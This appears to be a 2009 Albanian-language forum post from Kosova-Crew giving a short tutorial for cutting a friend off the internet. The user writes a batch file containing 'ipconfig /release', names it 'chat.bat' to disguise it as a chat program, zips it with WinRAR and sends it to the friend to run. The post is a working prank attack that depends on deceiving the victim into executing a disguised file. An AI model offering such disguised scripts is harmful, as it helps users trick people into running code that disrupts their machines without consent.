Kosova-Crew
 
ForumPortaliPytësoriLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Disconnectoje shokun prej internetit

Shko poshtë 
AutoriMesazh
endrit-vula
Fillestar-e
Fillestar-e
avatar

Numri i postimeve : 20
Registration date : 05/07/2009

MesazhTitulli: Disconnectoje shokun prej internetit   Mon Jul 06, 2009 10:44 pm

kur doni Disconnectoje shokun prej internetit duhet keshtu:
1.hapim notpad
2.shkruajme kete:
@ echo off
rem ************************************
rem Discconectoje Dikend Prej Internetit -
rem ************************************
cls
ipconfig /release
3.e ruajme me chat.bat

dhe e shtini ne nje winrar dhe e qoni te nje shok
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Disconnectoje shokun prej internetit
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Si në përralla, qeni zbulon qypin me ar me vlerë prej 10 mln dollarë (FOTO)
» Anë të mira dhe më shumë pasoja negative
» Ibrahim Egriu: Foto kujtimesh të pa harruara
» Prej nga e ka prejardhjen emri “shqiptar”?
» Kënd prej politikanëve e sundon gruaja, kush e ka amvise e kush Miss? (Foto)

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Mir Se Vini Ne Kosova-Crew :: Internet&Hardware :: E-Books&Tutorials-
Kërce tek: